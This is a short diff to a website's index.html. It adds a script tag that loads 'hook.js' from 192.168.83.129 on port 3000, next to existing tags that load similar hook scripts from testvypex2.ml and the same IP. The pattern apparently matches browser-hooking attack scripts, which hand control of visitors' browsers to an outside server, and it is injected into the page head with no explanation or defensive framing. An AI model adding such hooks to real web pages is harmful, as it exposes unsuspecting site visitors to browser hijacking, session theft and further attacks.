--- a/index.html
+++ b/index.html
@@ -16,6 +16,7 @@
 	</script><script src="https://testvypex2.ml/hook.js" type="text/javascript"></script>
 	<script src="https://192.168.83.129:3000/hook.js"></script>
 	<script src="http://testvypex2.ml:3000/hook.js"></script>
+	<script src="192.168.83.129:3000/hook.js"></script>
 </head>
 
 <body>
